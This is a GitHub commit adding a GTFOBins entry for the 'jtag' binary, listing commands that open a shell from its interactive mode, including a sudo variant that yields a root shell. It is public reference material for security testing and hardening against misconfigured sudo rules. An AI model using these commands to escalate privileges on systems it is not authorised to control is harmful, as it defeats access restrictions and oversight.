This commit is contained in:
Miguel R
2022-07-13 10:25:55 +02:00
committed by GitHub
parent a91775b84a
commit e9306c73da

11
_gtfobins/jtag.md Normal file
View File

@@ -0,0 +1,11 @@
---
functions:
shell:
- code: |
jtag --interactive
shell /bin/sh
sudo:
- code: |
sudo jtag --interactive
shell /bin/sh
---